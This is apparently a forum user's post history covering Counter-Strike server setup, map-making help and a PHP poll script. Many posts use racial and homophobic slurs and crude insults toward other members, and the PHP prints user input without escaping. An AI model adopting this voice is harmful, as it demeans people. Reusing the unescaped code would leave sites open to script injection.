ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </head> <body bgcolor="#000000"> <div id="main"> <?php $blacklist=""; $ip = ""; $file = fopen ("Data/Poll/blacklist.txt", "r"); while ($line = fgets($file)) { if( $line == $_SERVER['REMOTE_ADDR']) { $blacklist = "true"; break; } else print $line."\n"; } fclose($file); if (!isset($_POST['submitBtn']) && $blacklist!="true") { ?> <div class="caption"><?php echo $pollQuestion; ?></div> <div id="icon"> </div> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" name="poll"> <table width="300"> <?php foreach ($answers as $value) { echo '<tr><td><input type="radio" name="polling" value="'.$value['text'].'"/> '.$value['text'].'</td></tr>'; } ?> <tr><td align="center"><br/><input class="text" type="submit" name="submitBtn" value="Vote" /></td></tr> </table> </form> <?php } else { $count = 0; foreach ($answers as $value) { if ($value['text'] == $_POST['polling']) { $answers[$count]['count'] = ((int)$value['count'])+1; (int)$totalCount++; } ++$count; } writeData(); ?> <div class="caption">Thanks for your vote!</div> <div id="icon"> </div> <div id="result"> <table width="300"> <?php foreach ($answers as $value) { echo '<tr><td> '.$value['text'].'</td><td>'.$value['count'].'</td></tr>'; } ?> </table> </div> <?php } ?> <div id="source">© Sprinkles</div> </div> <div align="center"> <object width="1280" height="745"><param name="movie" value="http://www.youtube.com/v/PiHOonldMPU?fs=1&hl=en_US&rel=0&color1=0x3a3a3a&color2=0x999999&hd=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/PiHOonldMPU?fs=1&hl=en_US&rel=0&color1=0x3a3a3a&color2=0x999999&hd=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="1280" height="745"></embed></object> </div> </body> </html>
In Counter Strike DeathMatch by sprinkles:
Since csdm is the most popular type of server I decided to put up a deathmatch server. We also have a scrim server if superjer and his gang want to scrim us (we will rape, jus' saying).
In i need help with networking 2 computers by sprinkles:
You could print it all out, mail it to yourself, then scan it into your pc.
In OMG it's the end of the Universe as we know it! :O by sprinkles:
haha At the end she jus' gives up.
In Voting by sprinkles:
So I figured it out. Its not a reading problem, but a writing problem. It writes to the file the ip, then puts a whitespace, after that it line breaks. So its saying they don't match up. Any ideas on how to remove the whitespace? Here's the line that writes to the file: php code <?php fwrite($file2,$_SERVER['REMOTE_ADDR']."\r\n"); ?> Well that problem is solved now. New problem! It wont fucking line break. Same code as above.
In Voting by sprinkles:
The problem now is its not reading the file correctly. Its reading the file correctly now, but something is still wrong. php code <?php $blacklist=""; $file = fopen ("Data/Poll/blacklist.txt", "r"); $ln= 0; while ($line= fgets ($file)) { ++$ln; if( fgets($file) == $_SERVER['REMOTE_ADDR']) { $blacklist = "true"; } if ($line===FALSE) print ("FALSE\n"); else print ($line); } fclose($file); ?>
In Voting by sprinkles:
Haha, I'm so lazy. I jus' looked for a script online. php code <?php /************************************************* * Micro Polling System * * Version: 1.0 * Date: 2007-04-05 * * Usage: * Add your votings settings to polldata.txt file * The first line is the question and the other * linas are the possible answers. * ****************************************************/ $pollQuestion = ''; $answers = ''; function readData(){ global $pollQuestion,$answers; // Read configuration $rawdata = file('polldata.txt'); // Get the question for polling $pollQuestion = $rawdata[0]; // Get number of answers - The foirs row is the question $numberOfAnswers = sizeof($rawdata)-1; $count = 0; for ($i=1; $i <= $numberOfAnswers; $i++){ $answerData = explode(':',$rawdata[$i]); // If tha actual row is not empty than add to the answers array if (strlen(trim($answerData[0]))>0){ $answers[$count]['text'] = $answerData[0]; $answers[$count]['count'] = $answerData[1]; ++$count; } } } function writeData(){ global $pollQuestion,$answers; $file = fopen('polldata.txt','w'); fwrite($file,$pollQuestion."\r\n",strlen($pollQuestion)); foreach ($answers as $value) { $row = $value['text'].':'.$value['count']."\r\n"; fwrite($file,$row,strlen($row)); } fclose($file); }
In Flash Problem by sprinkles:
http://bamfcs.com/maps How do I get it to stop blinking? I tell it to gotoAndStop(frame#); where frame# is the respective frame number. And I even have AS telling it on each frame to stop();! WTF!
In Cyborg R.A.T 9 by sprinkles:
My only concern would be that tool that sticks out the back. I would assume that gets in the way.
In How to make your own Sky by sprinkles:
nectar said: yes the big box ake map sucks, they told me it laggs out the map.
It increase map lag by about 20%!
In How to make your own Sky by sprinkles:
You want me to break it down for you? When you build a proper sky box, VIS says "Hey, this stuff is on the outside, lets trash it all." Thusly, you are, mostly, only rendering what the player can see. When you build a giant box around your map, and sky it, it causes VIS to keep the outside faces. That means, all the stuff you wouldn't be able to see with a proper sky box, will be rendered. It will approximately increase world polygons by 1/3 %. Take a look at Mate's picture and you'll understand.
In How to make your own Sky by sprinkles:
Outcast said: Select the texture called "sky" and put it where you want,i usually make a huge box around the map,then i go on tools and "make it hollow".
And, that's why your maps suck.
In I Jus' Noticed by sprinkles:
SolidKAYOS said: Knuckle head..pshh..that pun is so lame i cant counter it...
Well, if you were on more you wouldn't be a douche bag.
In I Jus' Noticed by sprinkles:
Down Rodeo said: Not really, that's not a logical conclusion. Logic is awesome :)
How so?
In Makin' a .gif from a vid. by sprinkles:
Outcast said: Btw i'm not gonna press the PrtScn button every sec,so just in case someone would recommend no thanks.:
Of course not! The framerate would be horrible! You have to press it at least 12 times a second. "60i (actually 59.94, or 60 x 1000/1001 to be more precise; 60 interlaced fields = 29.97 frames) is the standard video field rate per second for NTSC television (e.g. in the US), whether from a broadcast signal, DVD, or home camcorder. This interlaced field rate was developed separately by Farnsworth and Zworykin in 1934,[1] and was part of the NTSC television standards mandated by the FCC in 1941. When NTSC color was introduced in 1953, the older rate of 60 fields per second was reduced by a factor of 1000/1001 to avoid interference between the chroma subcarrier and the broadcast sound carrier."
In I Jus' Noticed by sprinkles:
melloyellow582 said: So, we can conclude that while somebody cares, they are incredibly insignificant and pathetic in comparison to everything else. In fact, they are getting more insignificant and pathetic every second.
So we can deduce from this statement, that what you say doesn't matter. Or, at least, we can conclude that what you say is so small in value, and getting smaller every second, that it virtually does not matter.
In I Jus' Noticed by sprinkles:
Ladies and gentlemen, we will be back after I shit my pants and bet on Nascar matches.
In Anyone interested in GNU/Linux/Open source by sprinkles:
Netflix said: For the past two decades, a group of computer hackers, neocommunists and entrepreneurs has been gradually undermining Microsoft's monopoly and fundamentally changing the way software is developed and owned -- a revolution that resulted in the Linux operating system and the Open Source movement. This fascinating documentary explores the OS movement's origins and depicts the grassroots nature of Linux and OS as they march into the mainstream.
![]()
In how do i make a driveable car in cs 1.6 by sprinkles:
HoV Black said: its exactly in the middle except vertically was i supposed to put it in the middle vertically
On every axis.
In NEED HELP! by sprinkles:
Down Rodeo said: Looks like it's too big. But Goddamn, I was looking forward to an interesting "Programming Help" post. Screw you lorenzo, whatever your name is.
Same. I was like 'oh a chance to learn!'
In how do i make a driveable car in cs 1.6 by sprinkles:
2. Take the origin brush, make a block and place it in the middle of your car, middle in both width and height seems best.
In how do i make a driveable car in cs 1.6 by sprinkles:
Then you did it wrong. What exactly did you do?
In "The system cannot find the file specified." by sprinkles:
I thought Windows also used tildes for temporary directories?
In "The system cannot find the file specified." by sprinkles:
>> There was a problem compiling the map. >> Check the file c:\documents and settings\beggi\my documents\mapping\holtavegurtest.log for the cause.
In "The system cannot find the file specified." by sprinkles:
beggi90 said: ** Command: C:\DOCUME~1\Beggi\MYDOCU~1\Mapping\hlrad.exe Correct me if I'm wrong, but you're working from a temporary directory?
In "The system cannot find the file specified." by sprinkles:
** Command: C:\HAMMER~1\ZHLT34~1\hlrad.exe ** Parameters: "c:\documents and settings\beggi\my documents\mapping\holtavegurtest" Look at the directories. They are not in the same folder. They have to be in the same folder.
In Teamspeak vs Ventrilo by sprinkles:
Down Rodeo said: I wasn't drunk nine hours ago. I will admit to tipsiness one hour ago.
You know when he's drunk: The Chat Box said: Down Rodeo said:
I'm pretty slashed, I thought you'd want to know. 18:44:30 MDTDown Rodeo said: It's not the kind of thing I'd want to let you know though 18:45:14 MDTDown Rodeo said: At least, I'd not let you know by poor typing quality, the kind that is filled with errors like Ke$ha is filled with cocks 18:46:32 MDTDown Rodeo said: I'd merely let you know by the fact that I am actually daring to excrete these sentences. 19:47:28 MDTnectar said: hi sprinkles 19:54:22 MDTDown Rodeo said: I'm not Sprinkles. 20:01:14 MDTnectar said: i know 20:01:15 MDTnectar said: lol 20:01:21 MDTnectar said: btw what u saying? 20:09:49 MDTDown Rodeo said: NOTHING 20:12:42 MDTnectar said: can u help? 20:13:57 MDTDown Rodeo said: I can only unhelp, you probably don't want that. 20:14:28 MDTDown Rodeo said: NIGHT CHILDREN 20:14:37 MDTnectar said: i love u 20:14:39 MDTnectar said: u help me 20:25:53 MDTsprinkles said: what do you need help with
In Ight Niggas by sprinkles:
Down Rodeo said: Link fail! You've somehow made it a Superjer link.
Which is to say, drop the quotes. Google Chrome likes to do that crazy shit for you.
In Teamspeak vs Ventrilo by sprinkles:
Why pay for something when you can get something else that does the same thing for free?
In i cum when i listen to this song by sprinkles:
Were you guys, like, on the high school debate team?
In Counter Strike 1.6 Server on Debian by sprinkles:
Yes I know that . is the current dir. I also know that /usr/hlds/ is the /usr/hlds/ dir. It was being a dick and made me what 20 mins before downloading the shit. But! No seg faults so far!
In Superjer! by sprinkles:
Well seeing as the page is encrypted or something, I can't view the source. I went in with winscp and I saw what you did there. More latter, cooking now. Alright, so he jus' put his music in a folder. And told the link to go to the mp3. I should have noticed this, given the .mp3 extension, and the ID3 tag.
In Superjer! by sprinkles:
Are you serious? http://www.superjer.com/music/SuperJer%20-%20The%20Laz.mp3
In Counter Strike 1.6 Server on Debian by sprinkles:
Tried install hlds in a new dir. Now it tells me it couldn't find an installation at dir .period code 114:/usr/hlds2# ./steam -command update -game cstrike -dir .Checking bootstrapper version ... Updating Installation removing stale semaphore last operated on by process 15775 with name 0eBlobRegistryMutex_6B53E6F8EFF3CFA80894AD1DCF60FC87 removing stale semaphore last operated on by process 15775 with name 0eBlobRegistrySignal_6B53E6F8EFF3CFA80894AD1DCF60FC87 No installation record found at .
In Made a crappy video by sprinkles:
I like your style of comedy. "On second thought, I think its the right wire."
In Ight Niggas by sprinkles:
Like I said we have a new Counter Strike 1.6 gaming community. server: Also, and I hope superjer doesn't mind, I put Decoy is Hot on our homepage here. It links to superjer's music page, so I don't think he'll be mad. But, soups if you are, then I can always take it down.
In i cum when i listen to this song by sprinkles:
Wow. That entire essay was jus' rambling. I'm not defending the slut or anything. But come on, when you're writing anything about how retarded somebody is, you don't need to give me the exact day/time/event you heard it at. Jus' out of concern, who zips a padlock? I'm pretty sure, if all a padlock did was zip the security measure of it would drop significantly. And another thing, does it annoy/piss off anybody else how they say "It only matters who I is?"
In I can't seem to fix this problem... PLEASE HELP by sprinkles:
You're using that toxicgreen texture. If you notice it has an '!' before the name. This denotes that it acts like a func_water. Thus you have an entity outside your map. Which would cause the leak. Change the texture or move the brush.
In Counter Strike 1.6 Server on Debian by sprinkles:
superjer said: Are you still using any renamed .so files? You really shouldn't be.
Fresh install of hlds, so no. superjer said: Or do you have any weird settings at all?
No? Basic settings (you mean in server.cfg right?) superjer said: I know it is easy with AMX (or a map) to create too many entities and cause this error.
Map was/is de_dust2. Don't have many plugins for amxx.
In Counter Strike 1.6 Server on Debian by sprinkles:
superjer said: Does it happen on a particular map?
Well we haven't been running anything but de_dust2.
In COUNTAR STRIEK SERVAR by sprinkles:
Rockbomb said: sprinkles said: Actually it does dumbass, that's the whole point of using it. Doesn't matter what pc its downloading from. What matters is its downloading via http.
In COUNTAR STRIEK SERVAR by sprinkles:
Actually it does dumbass, that's the whole point of using it. Doesn't matter what pc its downloading from. What matters is its downloading via http.
In Counter Strike 1.6 Server on Debian by sprinkles:
Yes. New problem though. I get some "segmentation fault" error. This usually happens at world spawns or round starts. And sometimes is invoked by the amx super menu (not amx super itself). Ok, I'm home now, more details. ./hlds_run: line 321: 8739 Segmentation fault $HL_CMD
In COUNTAR STRIEK SERVAR by sprinkles:
Rockbomb said: Hey guess what, thanks to Superjer I just set up my server to also be used as a web server... check it out: link
Shit how'd you do that?
In COUNTAR STRIEK SERVAR by sprinkles:
Rockbomb said: Ok, I need help with one last problem
So, I can't seem to get the "fast downloads" to work correctly. You need a webserver to do that, it works off of http.
In COUNTAR STRIEK SERVAR by sprinkles:
Rockbomb said: So once I figure out how to get this newest metamod working, everything should run fine
More than likely you need to update libstdc++. And, btw, I can get you the stuff you need to patch your server for both 47 and 48 protocols.
In Counter Strike 1.6 Server on Debian by sprinkles:
Ok, so the problem was that the library was missing (i copied i486 as i386). New problem: code Error:/usr/hlds/engine_i686.so: undefined symbol: __pure_virtual
In Counter Strike 1.6 Server on Debian by sprinkles:
code 114:/usr/hlds# ./hlds_run -game cstrike +ip ip.de.internet _sv_lan 1 -nomaster +maxplayers 24 +map de_dust2Auto detecting CPU Using Pentium II Optimised binary. Auto-restarting the server on crash Error:libSteamValidateUserIDTickets_i386.so: cannot open shared object file: No such file or directory Unable to load engine, image is corrupt.
In WinSCP by sprinkles:
Ok, we are setting up a Counter Strike 1.6 server. I wanted to use WinSCP to update fastdl, add new maps, etc. It is too much hassle to login remotely to the rig. Do I have to have anything running on my server to enable WinSCP? How do I add user accounts? Does it work on Unix machines?
In Counter Strike 1.6 Server on Debian by sprinkles:
buq and RB win. You will receive the information I specified earlier.
In Counter Strike 1.6 Server on Debian by sprinkles:
How about this, The first person to help me out gets: to join 'this' community recommendation for admin (I'm the third person on the chain-o-command :) Hurry, before somebody else gets it.
In Counter Strike 1.6 Server on Debian by sprinkles:
So we are starting a new community for CS. I am "Teh Server Guy." However, I expected we would be running it off of a Windows rig. But apparently, we are running it off of Debian. I'm guessing it is going to be the same. But, I'm also guessing, I need a non-steam/steam server compiled for Linux, huh? And then, I have to manually compile the plugins for Linux as well?
In Map won't load by sprinkles:
Wasabi_Jr said: As far as the error, it gives me a 'The Instruction at 0x####### referenced memory at 0x#######. The memory could not be 'read'
That's more to do with Windows/your memory. Is the RAM going bad?
In COUNTAR STRIEK SERVAR by sprinkles:
Rockbomb said: sprinkles said: Rockbomb said: 192.168.0.1
And, the first IP I was usin I got from my router config page That's probably the internal ip for your current rig. Your external (wan) ip will not start with 192.168, ever. Your ip address can be found here: http://www.superjer.com/ip/ Use that. Sprinkles, did you even read what DR said? And the IP that link shows is the same one I used in my first post. You expect me to read!?!?!?
In COUNTAR STRIEK SERVAR by sprinkles:
Rockbomb said: 192.168.0.1
And, the first IP I was usin I got from my router config page That's probably the internal ip for your current rig. Your external (wan) ip will not start with 192.168, ever. Your ip address can be found here: http://www.superjer.com/ip/ Use that.
In Beta Party [Tonight!] by sprinkles:
Rockbomb said: sprinkles said: We may have a beta test tonight.
Your sound failed. And yes, did some major architectural work. I will do some shit with textures later I suppose.
In Beta Party [Tonight!] by sprinkles:
SRAW said: and why not make an indoor map using the half life textures with the de_inferno layout?
Explain. SRAW said: using the half life textures
They suck.
In Beta Party [Tonight!] by sprinkles:
Yeah, I have to do some architectural work on the map. But, that doesn't require beta testing. Not sure about the next map I'm going to make. I kinda wanted this next map to have a de_inferno feel. Give me ideas, and the sooner we will have beta parties again.
In [HELP] respawns like awp_snowsk337 by sprinkles:
simbad said: sprinkles said: Decompile the map and learn.
with which tool?? BspTwoMap.
In sound by sprinkles:
This is a rare error. Anyways, it means that the amount of RAM allocated for the map (which is a fixed amount) is full. You have too many models, too many brushes, too many sounds, some models are way to big, some sounds are way to big, etc. Delete whatever is causing the problem. Please don't delete posts.
In Beta Party [Tonight!] by sprinkles:
Rockbomb said: sprinkles said: Rockbomb said: I'm going to let them cut off my balls, and turn me into a queer on Monday.
And get paid shittons of money for it too... and that money comes from you, the common taxpayer Yeah, you'll get paid 'shittons' of money for being an E4. In the AF at that! I told you, you need to go to OCS, you'll come out of there an officer. You'll already be making 6 figures by your first day.
In [HELP] respawns like awp_snowsk337 by sprinkles:
Decompile the map and learn. It has something to do with trigger_relays or something.
In sound by sprinkles:
nob491 said: having a problem i don't get sound in my map
and i have question to make sky i just choose sky texture and make box like a roof? Run the map. Check the console when it first loads, and when you walk through a trigger, or press the button. Post the results here And, yes.
In Beta Party [Tonight!] by sprinkles:
Rockbomb said: I'm going to let them cut off my balls, and turn me into a queer on Monday.
In Jeff Spicoli by sprinkles:
First off, double truckage, you should be banned. Secondly, he's cool. Not quite a pimp, but cool.
In This or That? by sprinkles:
the_cloud_system said: i think joan rivers did that once
![]() She has like the perfect nose for snorting crack cocaine. Jus' saying.
In sound by sprinkles:
Ight let me get you this. There are many advanced ways to do this, but let me get you the basics. You need to make a func_button somewhere, we will come back to this later. Next you need to place a point entity of the type ambient_generic somewhere. Now lets move onto the sound. It has to be less than about 3 minutes. In a very specific format: 11025 Hz mono (1 channel) 8 bit pcm Wav format Now, make a folder in your cstrike/sound/ directory, usually the name of your map. Back to your entities. Go to your ambient_generic. Set the path/filename to whatever folder you put your music in. That is anything after the cstrike/sound/ directory. Lets say you put the sound in cstrike/sound/myUncleBob/trigger.wav. What you would put in your entity is myUncleBob/trigger.wav. Now set the flags "play everywhere," "start silent." name your ambient_generic something useful. Say you want it to play a trigger sound, name it soundTrigger or something. Go to your func_button, make the target soundTrigger (or whatever you named the ambient_generic).
In This or That? by sprinkles:
Down Rodeo said: wangle it.
DR, you have to teach me some cool Scottish words. wangle flatmate And what were the others you use?
In There is Always a Problem With Sound in HL by sprinkles:
Shit works now, or some shit. Fuck I don't know.
In There is Always a Problem With Sound in HL by sprinkles:
Or I could put the correct path name (i.e. not sound/sound/). But there is a new problem, the sound isn't triggered. It plays at startup, and never again.
In There is Always a Problem With Sound in HL by sprinkles:
code Warning: Unable to open sound/sound/de_afghanistan/trigger.wav for transferError: server failed to transmit file 'sound/sound/de_afghanistan/trigger.wav
In Facepalms by sprinkles:
http://i200.photobucket.com/albums/aa63/romanticsorist/facepalm.jpg http://www.redstate.com/neil_stevens/files/2009/09/doublefacepalm.jpg http://img121.imageshack.us/img121/623/impliedfacepalmw.jpg http://i173.photobucket.com/albums/w42/barrow_co2/Facepalm.jpg http://img85.imageshack.us/img85/8316/thirdpartyfacepalm.jpg
In Beta Party [Tonight!] by sprinkles:
Vote and leave comments! http://twhl.co.za/vault.php?map=5522
In Beta Party [Tonight!] by sprinkles:
HoV Black said: can i have a slot? my in game name is [HoV] Black (No Sound)
Yes, you know the proper time and everything?
In Starting local game server never ends by sprinkles:
Are you daft!? You have too many wad files. 8 wad files is the maximum, and more than enough. Rockbomb beat me! your log file said: Warning: More than 8 wadfiles are in use. (20)
This may be harmless, and if no strange side effects are occurring, then it can safely be ignored. However, if your map starts exhibiting strange or obscure errors, consider this as suspect.
In Beta Party [Tonight!] by sprinkles:
Seeing as RB is the only one that wants to join, reserved slots are removed.
In Beta Party [Tonight!] by sprinkles:
This is the final beta testing party. I have 5 reserved slots on my server for superjer.com fellows. Details can be found here. Oh, the main point of this thread was to reserve your slots. I have a max of 5 available slots for superjer.com. Any unused slots will go to AoG. First come, first served. 1) Rockbomb
In You guys HAVE to try this out by sprinkles:
SolidKAYOS said: sprinkles said: He's definitely gay. Blah fucking blah
They have nice asses.
In You guys HAVE to try this out by sprinkles:
He's definitely gay. Didn't even comment on the hot chicks.
In problem with hammer by sprinkles:
You need to set the fgd file. http://www.superjer.com/learn2.php
In Teh Hammer by sprinkles:
Rockbomb said: I have a feeling that sprinkles was planning on accomplishing this using C#
And the .Net Framework.
In Teh Hammer by sprinkles:
Down Rodeo said: sprinkles said: Oh, by the way, the main point is I'm going to make something better than Hammer.
Hah hah hah hah hah hah. The original SUCKS.
In Sprinkles by sprinkles:
jrkookid said: I got Adobe AfterEffects, now how do I use it? hmmmmm.
http://videocopilot.net/tutorials/
In Teh Hammer by sprinkles:
Is being replaced. It sucks. Tried to save my map and it said out of memory! Then over-wrote the original file! Thank god I have a weaponscache.backup sitting around! Valve, you can suck meh balls. Oh, by the way, the main point is I'm going to make something better than Hammer. I will post all the problems (a lot of them) I encounter here.
In is html a dead language? by sprinkles:
@superjer lol But, did anybody see that bitch in the vid? She was UGLY.
In My Final Project. by sprinkles:
jrkookid said: I can't read anything on the site.
Yeah, talk about copy pasta. Its all in fucking Latin, Spanish, or some-other-fucking-language.
In Sprinkles by sprinkles:
jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5 jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5 jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5 jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5 jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5 jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5 jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5 jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5 jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5 jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5 jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5 jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5 jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5 jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5 jrkookid said: What program do you use to make your intros?
Adobe After Effects CS5
In Laptop help.. by sprinkles:
SolidKAYOS said: It teases the fuck out of us. Little bitch.
So you and your sister have 3-somes?
In Beta Testing Party! [Tonight] by sprinkles:
jrkookid said: Hmmmm, how big is the .bsp?
2009565 bytes about 2 mb
In Beta Testing Party! [Tonight] by sprinkles:
So tonight around 10:30 pm (mountain time), I will be hosting a beta testing party of my map de_afghanistan. ip/port: 98.245.129.68:27015 9:30 - Pacific Time 10:30 -Mountain Time 12:30 - Eastern Time Come join the party! The reason for this is I have made major changes to de_afghanistan, and I want your opinions. Your opinions matter, essentially they will make the map better. I'm in the home stretch of the map, and hope to add it to [AoG] Killing Grounds and [AoG] Warzone.
In Problem compiling by sprinkles:
Quote: Quote: Quote: Quote: Quote: Quote: Quote: Quote: Quote: Quote: Quote: Quote: Quote: Quote: Quote:
In Moar forum issues by sprinkles:
SRAW said: Why wasn't I able to login with any account yesterday?
Superjer removed your account to save disc space.
In show your desktop! by sprinkles:
Rockbomb said: Just got done customizing...
http://i152.photobucket.com/albums/s174/rockbomb/Untitled-23.png DUDE! That is slightly less than completely awesome!
In My Final Project. by sprinkles:
jrkookid said:
I refuse to read something that spells coordinates as co-ordinates.
In Women wakes up to find strange man in her bed by sprinkles:
jrkookid said: sprinkles said: SRAW said: Search bed intruder song, it won't be blocked, and it's shorter, however it has some gay dude singing a cover at the end
.... Does my previous YouTube post mean nothing? You people expect me to watch the shit you post on here?
In Women wakes up to find strange man in her bed by sprinkles:
SRAW said: Search bed intruder song, it won't be blocked, and it's shorter, however it has some gay dude singing a cover at the end
In -69!!!!!!!! by sprinkles:
SRAW said: Sprinkles obviously holds some weird messed up grudge against me, I guess it's cause he got owned too hard by everything I post here :(
It's ok, I'm here for you. FIRE To begin whipping Dance of the Dead Blackened is the End! To begin whipping Dance of the Dead Color our world Blackened! STFU Rockbomb.
In -69!!!!!!!! by sprinkles:
Rockbomb said: sprinkles said: Down Rodeo said: We could pull a Viacom and ask Youtube for everyone's IPs. Hah.
Reference? I'm gonna go out on a limb and guess he's referring to when Viacom asked Youtube for everyone's IPs. STFU Sraw.
In -69!!!!!!!! by sprinkles:
Down Rodeo said: We could pull a Viacom and ask Youtube for everyone's IPs. Hah.
Reference?
In What would you pay for a domain? by sprinkles:
superjer said: mcdiddys.com...damnfun.com
How many domains do you have!?
In new Animation. Days Of Yore by sprinkles:
I like how they move all steady and slow, then pop into place. You know what I mean?
In Teamspeak Server by sprinkles:
the_cloud_system said: ill do it when i have a pourpose to get on
Who said you were allowed on?
In Teamspeak Server by sprinkles:
So I created a Teamspeak server. So if for any reason you want to fjkd;afjk; Server info: ip 98.245.129.68 port 9987 so do that shit bitches, or something, whatever.
In Ok Final Trade Truck by sprinkles:
You'd be better off trading your Windows Vista for Ubuntu. Microsoft suck my balls!!!!!!!!!!!!!!!!!!!!!!!!!! Suck 'em bitches! Bitches! Bitch to the es! That's right bitches! Fucking bitch! Slap them hoes!
In Sorry, but its Epic! by sprinkles:
FallingShit said: Green suit: $45.00
White ball: $4.00 Bitch slapping SRAW with a white ball: PRICELESS There are things money cant buy, but for things you can. Hit SRAW hard with them. +rep
In I think sprinkles should be banned by sprinkles:
Rockbomb said: You know... I'm starting to think SRAW might actually be a really good random douche.
In I think sprinkles should be banned by sprinkles:
SRAW said: Do you even know what blasphemy means?
and he did have the title rocket man, until he complained and then aaronjer changed it to racquet man, and he also stole my sig, but then quickly changed it after we noticed it. You fail at trolling, so shut the fuck up already.
In Sorry, but its Epic! by sprinkles:
jrkookid said: sprinkles said: ![]() Green Troll= Sprinkles Muscle Guy= Rockbomb Nigga Bitch= SRAW
In i need some help by sprinkles:
the_cloud_system said: hows the latencey?
At the ISP of Sprinkles we always have our latency set at 98 degrees West (you thought we were talking about the band!?), 123.9973 degrees North. We also replace the batteries in our flashlights daily so you continue to get uninterrupted internet service. Anybody get the joke?
In i need some help by sprinkles:
At the ISP of Sprinkles, we provided fiber optic internet to all customers. For a bi-weekly fee of 'expensive' we give you unlimited bandwidth and other internet stuff. We also work for the mafia, so all your private information gets sent to them. Included in the package is free email accounts, which we regularly spam with gay porn. There is no installation fee, although we do need to drill holes the size of elephant dicks in your walls for the fiber optic cables.
In Funny Pictures by sprinkles:
Seagull stealing food: http://i240.photobucket.com/albums/ff77/LizKoz/Funny%20pics/gif.gif Cat running up slide: http://i402.photobucket.com/albums/pp105/patti49/ANIMATIONS-SUB%20ALBUMS%20TO/FELINES/Cat_slide_treadmill.gif
In Alien Swarm Mod Errors by sprinkles:
SRAW said: So you fixed it?
Yes, the project name was Server Swarm. I had to get rid of the " Swarm" part (including the space).
In SUCK IT ROCKBOMB by sprinkles:
SRAW said: You stupid shit, it's than not then
Yes, I made a grammatical error. Your point?
In This is for superjer by sprinkles:
fedex _ said: ....I DID DUMBASSES , they want some other shit and its a FUCKING GIFT CARD FROM VISA
Is it expired?
In I think sprinkles should be banned by sprinkles:
Rockbomb said: ...Sprinkles wins regularly, isn't a troll at all, whitebird was a spoof on blackbird (and was my idea). And I say he shouldn't be banned, so he shouldn't.
In Sorry, but its Epic! by sprinkles:
jrkookid said: sprinkles said: Rockbomb said: I give it a week and a half before
I come to your house and beat the shit out of you because I have nothing better to do. Rockbomb said: ![]() His badass-ness might beat you.
In I'll just leave this queer... by sprinkles:
No matter how many times I watch that I still cannot watch it to the end.
In Alien Swarm Mod Errors by sprinkles:
Well lets get to it. Error 4 error MSB3073: The command "if exist "C:\Program Files (x86)\Steam\SteamApps\sourcemods\ufo\bin\." goto ValveStart mkdir "C:\Program Files (x86)\Steam\SteamApps\sourcemods\ufo\bin\." :ValveStart copy "C:\Alien Swarm Mod\src\game\server\Release_swarm\"Server Swarm.dll "C:\Program Files (x86)\Steam\SteamApps\sourcemods\ufo\bin\.\Server Swarm.dll" if ERRORLEVEL 1 goto BuildEventFailed if exist "C:\Alien Swarm Mod\src\game\server\Release_swarm\"Server Swarm.map copy "C:\Alien Swarm Mod\src\game\server\Release_swarm\"Server Swarm.map "C:\Program Files (x86)\Steam\SteamApps\sourcemods\ufo\bin\.\Server Swarm.map" copy "C:\Alien Swarm Mod\src\game\server\Release_swarm\"Server Swarm.pdb "C:\Program Files (x86)\Steam\SteamApps\sourcemods\ufo\bin\.\Server Swarm.pdb" if ERRORLEVEL 1 goto BuildEventFailed goto BuildEventOK :BuildEventFailed echo *** ERROR! PostBuildStep FAILED for Server Swarm! EXE or DLL is probably running. *** del /q "C:\Alien Swarm Mod\src\game\server\Release_swarm\"Server Swarm.dll exit 1 :BuildEventOK :VCEnd" exited with code 1. C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\Microsoft.CppCommon.targets 113 6 Server Swarm Error 7 error MSB3073: The command "if exist "C:\Program Files (x86)\Steam\SteamApps\sourcemods\alienswarmod\bin\." goto ValveStart mkdir "C:\Program Files (x86)\Steam\SteamApps\sourcemods\alienswarmod\bin\." :ValveStart copy "C:\Alien Swarm Mod\src\game\client\Release_swarm\"Client Swarm.dll "C:\Program Files (x86)\Steam\SteamApps\sourcemods\alienswarmod\bin\.\Client Swarm.dll" if ERRORLEVEL 1 goto BuildEventFailed if exist "C:\Alien Swarm Mod\src\game\client\Release_swarm\"Client Swarm.map copy "C:\Alien Swarm Mod\src\game\client\Release_swarm\"Client Swarm.map "C:\Program Files (x86)\Steam\SteamApps\sourcemods\alienswarmod\bin\.\Client Swarm.map" copy "C:\Alien Swarm Mod\src\game\client\Release_swarm\"Client Swarm.pdb "C:\Program Files (x86)\Steam\SteamApps\sourcemods\alienswarmod\bin\.\Client Swarm.pdb" if ERRORLEVEL 1 goto BuildEventFailed goto BuildEventOK :BuildEventFailed echo *** ERROR! PostBuildStep FAILED for Client Swarm! EXE or DLL is probably running. *** del /q "C:\Alien Swarm Mod\src\game\client\Release_swarm\"Client Swarm.dll exit 1 :BuildEventOK :VCEnd" exited with code 1. C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\Microsoft.CppCommon.targets 113 6 Client Swarm 2 errors, don't know what is causing them. :S
In I'll just leave this queer... by sprinkles:
See this is why we have alcohol and tobacco, because of stupid shit like this. Those aren't lyrics. They jus' took words and threw them together with words they made up. And, I thought it would at least be a chick who sang/mutilated my ears, but no. That was a guy!?
In SUCK IT ROCKBOMB by sprinkles:
You know what Sraw, my ex was less attached then you. You're like that dog shit you step in. No matter what you do, you can't get it off your shoe.
In HTML Images by sprinkles:
